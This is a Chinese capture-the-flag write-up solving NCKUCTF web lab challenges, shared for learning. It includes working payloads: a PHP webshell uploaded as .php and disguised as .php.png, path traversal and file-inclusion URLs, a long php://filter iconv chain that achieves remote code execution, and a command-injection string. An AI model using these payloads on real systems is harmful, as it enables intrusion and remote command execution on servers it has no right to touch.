# nckuctf writeup ## Web ### shiba-shop https://chall.nckuctf.org:28100/ ![image](https://hackmd.io/_uploads/HkKMF7evyx.png) 一進去發現此頁面FLAG無連結沒法購買,試著點進他的前項及後項物品連結看看 ![image](https://hackmd.io/_uploads/B17aKXgvye.png) ![image](https://hackmd.io/_uploads/Hy4AYXxP1e.png) 發現這兩項物品的url分別是5429、5431,推測flag連結為5430,直接更改url ![image](https://hackmd.io/_uploads/Syh757lDJg.png) boom~進去了! 但隨後發現我們沒有足夠的錢買flag ![image](https://hackmd.io/_uploads/HkF55mxPyx.png) 先使用burp suite攔封包看看他送了甚麼給伺服器 ![image](https://hackmd.io/_uploads/ryj4imgDye.png) 那個wallet好可疑,嘗試改成1000000000000試 (也可以改html中的wallet value值) 改完後送出出現購買成功 ![image](https://hackmd.io/_uploads/SJaKs7gPJl.png) 回到主頁後即可發現網頁下方的flag ![image](https://hackmd.io/_uploads/rks9nQeDJg.png) flag:||NCKUCTF{B3w4r3_0f_th3_5h1b4owo}|| --- ### Redirect https://chall.nckuctf.org:28101 題目說了試重導向,直接開啟burp suite攔封包! Forward一次後發現第二封封包出現GET /flag.php的請求 ![image](https://hackmd.io/_uploads/B1yZlEevkx.png) 把他丟入repeater看看回傳資訊,就發現flag了 ![image](https://hackmd.io/_uploads/Hksvx4lD1l.png) flag:||NCKUCTF{r3D1rC7_15_700_F457}|| --- ### Cookie https://chall.nckuctf.org:28102/ ![image](https://hackmd.io/_uploads/rkSsuKx_ll.png) 依題目所言,先去看cookie ![image](https://hackmd.io/_uploads/rkl_FFl_ll.png) 發現有筆叫做user,目前的值為anonymous(匿名) 改成題目要的cookie_monster試試 ![image](https://hackmd.io/_uploads/ryiattx_lg.png) 重整後即可得到flag flag:||NCKUCTF{Y0U_4r3_C00K13_M0N573r}|| --- ### Robots https://chall.nckuctf.org:28103 ![image](https://hackmd.io/_uploads/BkgM9x3g_gx.png) 如題,先嘗試訪問robots.txt ![image](https://hackmd.io/_uploads/Bk-hlhx_ll.png) 得到特殊路徑,接著接續訪問該路徑 ![image](https://hackmd.io/_uploads/r1Ve-nlOll.png) 發現flag一直轉圈看不清楚,直接F12看原始碼 ![image](https://hackmd.io/_uploads/H1Z7bnldxl.png) flag:||NCKUCTF{robots.txt_M4Y_3XP053_53Cr37_P47H}|| --- ### gitleak https://chall.nckuctf.org:28104/ 依題意,嘗試訪問該網址的.git擋 目標:http://chall.nckuctf.org:28104/.git/ ![image](https://hackmd.io/_uploads/SkffTWMOge.png) 發現確實存在.git檔案 接著使用gittools這款工具直接dump git檔案,它會嘗試下載.git內的檔案 (https://github.com/internetwache/GitTools) ![image](https://hackmd.io/_uploads/B1W-xfzule.png) ![image](https://hackmd.io/_uploads/r1ZAgfGdgg.png) 下載好後使用,使用extractor解包/重建,解出commit與真正的檔案內容 ![image](https://hackmd.io/_uploads/B1_hWMMugg.png) ![image](https://hackmd.io/_uploads/rkGpXzMuel.png) 只有一個commit,進去之後ls發現.env檔 直接cat出來即可 ![image](https://hackmd.io/_uploads/r1PXVzzOxg.png) flag:||NCKUCTF{D0N7_3XP053_Y0Ur_git_F01D3r}|| --- ### phpisnice https://chall.nckuctf.org:28105/ 到達題目頁面後,能看到一串php代碼 ![image](https://hackmd.io/_uploads/Sy4iJEMuel.png) 經查詢,此題為php type juggling md5($A) == $A 這行,若兩變數一樣則可通過 根據php特性,兩字串在比較時,若字串為 0e 開頭,並且後續為數字,如:"0e12",將被視為$0 * 10^{12}$,也就是科學記號進行比較 舉個栗子: - "0e2" == "0e3" 在比較時: 1. $0 * 10^{2}$ == $0 * 10^{3}$ 2. 即 0 == 0 3. 回傳true 故此題要找出: 1. 0e開頭的科學記號字符串x 2. md5(x) = 0e開頭的科學記號字符串y 上網搜尋後,發現有非常棒的payload整理:https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Type%20Juggling/README.md#magic-hashes payload:0e1137126905 放入連結後重新請求,即得到flag ![螢幕擷取畫面 2025-08-07 232711](https://hackmd.io/_uploads/ryZZIHzOxx.png) flag:||NCKUCTF{php_15_7h3_n1c3_14n9u493}|| --- ### phpisbest https://chall.nckuctf.org:28106/ 到達題目頁面後,能看到一串php代碼 ![image](https://hackmd.io/_uploads/BJZBEUGdxx.png) 這題看起來跟phpisnice很像,但多了許多判斷式 判斷式: 1. 是否設置參數 2. A、B是否不一樣 3. B完全等於A 4. md5後兩者相等 多數人會卡在判斷2跟3,甚麼較不要相等但又要相等 但在早期的php中,有以下兩個特性 #### strcmp()問題 strcmp(),它預期的參數要是string型態 若是將array型態的值帶入strcmp中,會觸發錯誤並回傳null 所以當A、B其中一項是array時,就會觸發strcmp的回傳null,又由於弱比較,null == 0 會成立,即通過該判斷式 ![image](https://hackmd.io/_uploads/H145wLM_eg.png) #### md5()問題 與strcmp同理,md5預期參數要是string型態,若為array,一樣會報錯並回傳null ![image](https://hackmd.io/_uploads/BkuAF8MOel.png) 基於判斷式 md5($A) == md5(\$B),要成立兩邊皆須為array型態 故兩參數設為: A參數:A[]=a B參數:B[]=b 便能通過 1. 設置參數A、B 2. A、B不一樣 3. strcmp 函式報錯 null 弱比較成立 4. 兩 md5 函式報錯 null 比較成立 便能成功拿到flag payload:https://chall.nckuctf.org:28106/?A[]=a&B[]=b ![image](https://hackmd.io/_uploads/H1tjoIfdeg.png) flag:||NCKUCTF{php_15_7h3_8357_14n9u493}|| --- ### uploader https://chall.nckuctf.org:28107 ![image](https://hackmd.io/_uploads/B1HsMxmueg.png) 該題主要的php code如下,具備檔案上傳功能,猜測為檔案上傳漏洞rce找flag ```php <?php if (!empty($_FILES)) { $file = $_FILES['file']['tmp_name']; $hash = sha1(file_get_contents($file)); $extension = pathinfo($_FILES['file']['name'],PATHINFO_EXTENSION); $dest = '/var/www/html/upload/' . $hash . "." . $extension; move_uploaded_file($file,$dest); echo "<a href='/upload/$hash.$extension'>/upload/$hash.$extension</a>"; ?> <p><?php echo "Sucessful Uploaded !"; ?></p> <?php } else { ?> <p><?php echo "Please Upload A File !"; ?></p> <form action="index.php" method="post" enctype="multipart/form-data"> <input type="file" name="file"> <input type="submit" value="Upload !"> </form> <?php } ?> ``` 該題php沒有進行任何副檔名過濾,可直接上傳.php 先來個普通php webshell測試 poc: ```php <?php system($_GET['cmd']); ?> ``` 上傳該php成功後會出現下列情況 ![image](https://hackmd.io/_uploads/SytVuemOlg.png) 直接跟隨 ![image](https://hackmd.io/_uploads/SkqjdlmOll.png) 出現此問題代表沒有給poc要的cmd參數,給個ls進行嘗試 payload:https://chall.nckuctf.org:28107/upload/05ecab1deb5796ba5968d77c221ae3421a113629.php?cmd=ls ![螢幕擷取畫面 2025-08-08 121231](https://hackmd.io/_uploads/rJ78Kxmuxx.png) 後續不斷尋找flag相關檔案並cat,在根目錄發現最終flag(使用;分隔多次指令) payload:https://chall.nckuctf.org:28107/upload/05ecab1deb5796ba5968d77c221ae3421a113629.php?cmd=cd%20/;ls;cat%20flag_n2i3na ![螢幕擷取畫面 2025-08-08 121622](https://hackmd.io/_uploads/Sk4N5eXOxl.png) flag:||NCKUCTF{w385h311_15_4_427}|| --- ### uploader-waf https://chall.nckuctf.org:28108 ![image](https://hackmd.io/_uploads/HJAaqgmugg.png) 類似uploader,該題主要的php code如下,具備檔案上傳功能,猜測為檔案上傳漏洞rce找flag ```php <?php if (!empty($_FILES)) { $file_name = $_FILES['file']['name']; $extension = pathinfo($file_name,PATHINFO_EXTENSION); $dest = '/var/www/html/upload/' . $file_name; if ($_FILES['file']['type'] === "image/png"){ if ($extension !== "php" ){ move_uploaded_file($_FILES['file']['tmp_name'], $dest); echo "<a href='/upload/$file_name'>/upload/$file_name</a>"; echo "<p>Sucessful Uploaded !</p>"; } else{ echo "<p>bad hecker detect! </p>"; } }else{ echo "<p>Upload fail! Please upload png file</p>"; } ?> <?php } else { ?> <p><?php echo "Please Upload A File !"; ?></p> <form action="index.php" method="post" enctype="multipart/form-data"> <input type="file" name="file"> <input type="submit" value="Upload !"> </form> <?php } ?> ``` 但該題具有過濾: 1. 只能上傳圖檔(如png、jpg) 2. 結尾不能是php 而具體繞過方法如下: 透過curl得知該題是使用Apache server,並且php已被啟用(具有handler) ```bash ┌──(kali㉿kali)-[~/…/ctf/ncku_plat/web/uploader] └─$ curl -I https://chall.nckuctf.org:28108 HTTP/1.1 200 OK Date: Fri, 08 Aug 2025 04:37:26 GMT Server: Apache/2.4.38 (Debian) X-Powered-By: PHP/7.2.34 Content-Type: text/html; charset=UTF-8 ``` 而根據Apache官方文件(https://getdocs.org/Apache-http-server/docs/latest/mod/mod_mime) >Care should be taken when a file with multiple extensions gets associated with both a media-type and a handler. This will usually result in the request being handled by the module associated with the handler. For example, if the .imap extension is mapped to the handler imap-file (from mod_imagemap) and the .html extension is mapped to the media-type text/html, then the file world.imap.html will be associated with both the imap-file handler and text/html media-type. When it is processed, the imap-file handler will be used, and so it will be treated as a mod_imagemap imagemap file. Apache 在處理檔案時會同時考慮: - 最右邊的副檔名來決定 MIME Type(媒體類型),例如 .html → text/html - 具任何副檔名會直接觸發 Handler(處理模組),如 .php → php handler 當一個檔案同時符合 MIME Type 和 Handler 的條件時,Apache 通常優先使用 Handler來處理這份請求。 以shell.php.png舉例: payload: ```php <?php system($_GET['cmd']); ?> ``` 接著分析題目的php: ```php if ($_FILES['file']['type'] === "image/png") ``` 該行會成立,因為對瀏覽器來說,該檔案確實為png圖檔 同理: ```php if ($extension !== "php" ) ``` $extension會是最後面的副檔名,即png,該行成立,並成功上傳檔案 ![image](https://hackmd.io/_uploads/BkZWRbQOxg.png) 對upload來說,我們確實是上傳png檔,可該網站具有php handler,因此我們在訪問檔案時,他會以php的方式去處理我們的檔案 ![image](https://hackmd.io/_uploads/SyEblz7_el.png) 給上具體的cmd poc ![image](https://hackmd.io/_uploads/BkCBeGmOex.png) 後續不斷尋找flag相關檔案並cat,在根目錄發現最終flag(使用;分隔多次指令) ![image](https://hackmd.io/_uploads/S1HJbG7Oge.png) flag:||NCKUCTF{w385h311_15_4_427_4nd_m491c}|| --- ### pathwalker ![image](https://hackmd.io/_uploads/Bk9sbM7dll.png) 題目直接從url取得page參數並瀏覽該網頁 嘗試點擊一個連結 ![image](https://hackmd.io/_uploads/ByHKfGmull.png) 嘗試將page改成 .. ![image](https://hackmd.io/_uploads/Hy_AMzmuxg.png) 變成...php了,那如果pages帶../flag呢? ![image](https://hackmd.io/_uploads/ryUD7MXulg.png) payload:https://chall.nckuctf.org:28109/?page=../flag 直接拿到flag flag:||NCKUCTF{p47h_724v32541_15_0u2_f213nd}|| --- ### pathwalker-waf https://chall.nckuctf.org:28110 ![image](https://hackmd.io/_uploads/SkDrBzmOgg.png) 此路徑繞過新增了過濾功能,設置了正則表達式進行檢測,page參數必須以圖中三項東西為開頭 故可利用?page=apple/../flag來不斷探查,直到找到flag ![image](https://hackmd.io/_uploads/Hy7f8Gm_le.png) payload:https://chall.nckuctf.org:28110/?page=apple/../../flag flag:||NCKUCTF{p47h_724v32541_h45_4107_721ck}|| --- ### lfi https://chall.nckuctf.org:28111 ![image](https://hackmd.io/_uploads/r14Hq_Q_lx.png) 當瀏覽到cappo頁面時,會發現flag的位置 ![image](https://hackmd.io/_uploads/rJjhmy8dgg.png) 實際訪問該位置,卻告訴我們沒有flag ![image](https://hackmd.io/_uploads/HkV5NJU_gg.png) 基於[這篇文章](https://www.riskinsight-wavestone.com/en/2022/09/barbhack-2022-leveraging-php-local-file-inclusion-to-achieve-universal-rce/?utm_source=chatgpt.com),我們能透過輸入該payload嘗試輸出php原始碼 >Using this technique, it is not possible at first to exfiltrate PHP source files, since they are executed when they enter the include or require statement. However, it is possible to rely on the php:// stream and its filter function to apply a Base64 encoding before including the file, therefore changing the active content into innocent plaintext. For example: http://webapp/?p=php://filter/convert.base64-encode/resource=index.php payload:https://chall.nckuctf.org:28111/?page=php://filter/convert.base64-encode/resource=flag payload如此是因flag檔本身在 web 根目錄 /var/www/html中,php執行時預設就會去 web 根目錄找,因此不需要路徑跳躍 出現base64編碼後的原始碼了 ![image](https://hackmd.io/_uploads/BJJXBkIugl.png) 直接decode可得原始碼與flag。(flag被註解掉難怪找不到) ![image](https://hackmd.io/_uploads/rJ8uBJ8Oxe.png) flag:||NCKUCTF{1f1_15_7h3_900d_ch4nc3}|| --- ### lfi2rce(官方解) https://chall.nckuctf.org:28112 在cappo頁面發現flag在根目錄的線索 ![image](https://hackmd.io/_uploads/SkPuZZI_le.png) 在網上搜尋了許多php2rce的方法,但往往都無法成功,記錄檔訪問也被擋 https://swisskyrepo.github.io/PayloadsAllTheThings/File%20Inclusion/LFI-to-RCE/ 最後只能臣服於[官方解](https://www.youtube.com/watch?v=PqydmB-IoYc&list=PLFFwfkaPB2mra818QJIiPJtXFShdndl9z&index=3&t=2992s) 官方解一樣使用php偽協議,直接拿現有的payload使用,只能說php太酷啦 payload最後的system記得放要執行的系統指令 payload:https://chall.nckuctf.org:28112/?page= + php payload php payload:([來源](https://github.com/wupco/PHP_INCLUDE_TO_SHELL_CHAR_DICT)) <details> php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP869.CSIBM1163|convert.iconv.ISO2022KR.UNICODE|convert.iconv.LATIN3.NAPLPS|convert.iconv.ISO-IR-156.UNICODEBIG|convert.iconv.ISO885915.CSISO90|convert.iconv.ISO-IR-156.8859_9|convert.iconv.CSISOLATINGREEK.MSCP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP922.CSISOLATIN5|convert.iconv.ISO2022KR.UTF-32|convert.iconv.IBM912.ISO-IR-156|convert.iconv.ISO-IR-99.CSEUCPKDFMTJAPANESE|convert.iconv.8859_9.ISO_6937-2|convert.iconv.CSISO99NAPLPS.CP902|convert.iconv.ISO-IR-143.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.PT154.874|convert.iconv.CSISO2022KR.UTF-32|convert.iconv.CSIBM901.ISO_6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CSISO2022KR.UTF16|convert.iconv.LATIN6.CSUCS4|convert.iconv.UTF-32BE.ISO_6937-2:1983|convert.iconv.ISO-IR-111.CSWINDOWS31J|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.CSA_T500.EUCJP-WIN|convert.iconv.CP855.UTF-16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.CSISO90.UCS-4BE|convert.iconv.OSF00010004.UTF32|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.CSISO90.ISO-10646/UTF-8|convert.iconv.BALTIC.SHIFT_JISX0213|convert.iconv.CP949.CP1361|convert.iconv.CSISOLATIN2.T.61|convert.iconv.IBM932.BIG-5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.ISO-IR-156.CSUCS4|convert.iconv.KOI8-T.CSIBM932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.NAPLPS.UCS-4|convert.iconv.ISO_8859-4.T.618BIT|convert.iconv.CSISO103T618BIT.BIG5-HKSCS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP869.CSIBM1163|convert.iconv.ISO2022KR.UNICODE|convert.iconv.LATIN3.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP869.CSIBM1163|convert.iconv.ISO2022KR.UNICODE|convert.iconv.LATIN3.NAPLPS|convert.iconv.ISO-IR-156.UNICODEBIG|convert.iconv.ISO885915.CSISO90|convert.iconv.BIGFIVE.CSIBM943|convert.iconv.LATIN6.WINDOWS-1258|convert.iconv.CP1258.CSISO103T618BIT|convert.iconv.NAPLPS.OSF10020359|convert.iconv.WINDOWS-1256.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-GR.UNICODE|convert.iconv.ISO_8859-14:1998.UTF32BE|convert.iconv.OSF00010009.ISO2022JP2|convert.iconv.UTF16.ISO-10646/UTF-8|convert.iconv.UTF-16.UTF8|convert.iconv.ISO_8859-14:1998.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP869.CSIBM1163|convert.iconv.ISO2022KR.UNICODE|convert.iconv.LATIN3.NAPLPS|convert.iconv.ISO-IR-156.UNICODEBIG|convert.iconv.ISO885915.CSISO90|convert.iconv.BIGFIVE.CSIBM943|convert.iconv.LATIN6.WINDOWS-1258|convert.iconv.CP1258.CSISO103T618BIT|convert.iconv.NAPLPS.OSF10020359|convert.iconv.WINDOWS-1256.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP922.CSISOLATIN5|convert.iconv.ISO2022KR.UTF-32|convert.iconv.IBM912.ISO-IR-156|convert.iconv.ISO-IR-103.CSEUCPKDFMTJAPANESE|convert.iconv.OSF00010002.UNICODE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.ISO-IR-99.CSEUCPKDFMTJAPANESE|convert.iconv.CSEUCKR.UTF-32|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.ISO-IR-156.CSUCS4|convert.iconv.KOI8-T.CSIBM932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.CSISO90.UCS-4BE|convert.iconv.OSF00010004.UTF32|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO-IR-6.ISO646-DE|convert.iconv.ISO2022KR.UTF32|convert.iconv.MAC-UK.ISO-10646|convert.iconv.UCS-4BE.855|convert.iconv.ISO88599.CSISO90|convert.iconv.ISO_6937:1992.10646-1:1993|convert.iconv.CP773.UNICODE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UK.852|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP922.CSISOLATIN5|convert.iconv.ISO2022KR.UTF-32|convert.iconv.IBM912.ISO-IR-156|convert.iconv.ISO-IR-99.CSEUCPKDFMTJAPANESE|convert.iconv.8859_9.ISO_6937-2|convert.iconv.ISO6937.UCS-2LE|convert.iconv.CP864.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP869.CSIBM1163|convert.iconv.ISO2022KR.UNICODE|convert.iconv.LATIN3.NAPLPS|convert.iconv.ISO-IR-156.UNICODEBIG|convert.iconv.ISO885915.CSISO90|convert.iconv.ISO-IR-156.8859_9|convert.iconv.CSISOLATINGREEK.MSCP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.ISO-IR-156.CSUCS4|convert.iconv.KOI8-T.CSIBM932|convert.iconv.CSIBM932.IBM866NAV|convert.iconv.IBM775.UTF32|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.ISO-IR-156.CSUCS4|convert.iconv.KOI8-T.CSIBM932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.ISO-IR-156.CSUCS4|convert.iconv.KOI8-T.CSIBM932|convert.iconv.CSIBM932.IBM866NAV|convert.iconv.IBM775.UTF32|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO-IR-6.ISO646-DE|convert.iconv.ISO2022KR.UTF32|convert.iconv.MAC-UK.ISO-10646|convert.iconv.UCS-4BE.855|convert.iconv.ISO88599.CSISO90|convert.iconv.ISO_6937:1992.10646-1:1993|convert.iconv.CP773.UNICODE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.ISO-IR-156.OSF00010104|convert.iconv.CP860.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO-IR-6.ISO646-DE|convert.iconv.ISO2022KR.UTF32|convert.iconv.MAC-UK.ISO-10646|convert.iconv.UTF-32BE.MS936|convert.iconv.8859_5.UTF32|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP922.CSISOLATIN5|convert.iconv.ISO2022KR.UTF-32|convert.iconv.IBM912.ISO-IR-156|convert.iconv.ISO-IR-99.CSEUCPKDFMTJAPANESE|convert.iconv.8859_9.ISO_6937-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-GR.UNICODE|convert.iconv.ISO_8859-14:1998.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CP869.CSIBM1163|convert.iconv.ISO2022KR.UNICODE|convert.iconv.LATIN3.NAPLPS|convert.iconv.ISO-IR-90.UTF16LE|convert.iconv.IBM874.UNICODEBIG|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.BIGFIVE.UTF32|convert.iconv.WINSAMI2.T.61|convert.iconv.ISO-IR-103.ISO-IR-209|convert.iconv.8859_5.CSISO2022JP2|convert.iconv.ISO-2022-JP-3.IBM-943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.CSISO2022KR.UTF16|convert.iconv.LATIN6.CSUCS4|convert.iconv.UTF-32BE.ISO_6937-2:1983|convert.iconv.ISO-IR-111.CSWINDOWS31J|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=/etc/passwd& 1=system('cat /flag_23fb1b3'); </details> 總之就是不斷改最後面的系統指令,直到發現根目錄的flag並cat出來 ![image](https://hackmd.io/_uploads/SJ5vPE8dxx.png) flag:||NCKUCTF{w385h311_15_4_427}|| --- ### dig https://chall.nckuctf.org:28113 ![image](https://hackmd.io/_uploads/BkHTsNIugx.png) 經典的command injection,注意指令閉合及隔開不同指令即可 'ls' == ls,多了引號一樣能執行 原始碼是直接執行把輸入接近進去執行 ```php <?php if (isset($_POST['name'])) : ?> <p> <p>dig result:</p> <pre><?= system("dig '" . $_POST['name'] . "';") ?></pre> </p> <?php endif; ?> ``` payload:google.com';'ls' '/';'cat' '/flag_n2i3na ![image](https://hackmd.io/_uploads/SyZInELulg.png) flag:||NCKUCTF{d19_70015_15_n1c3!}|| --- ### dig-waf1 ### 後方施工中`(*>﹏<*)′ ![image](https://hackmd.io/_uploads/BJ4R9ONTgl.png) ![image-1](https://hackmd.io/_uploads/r1V0c_Eage.png)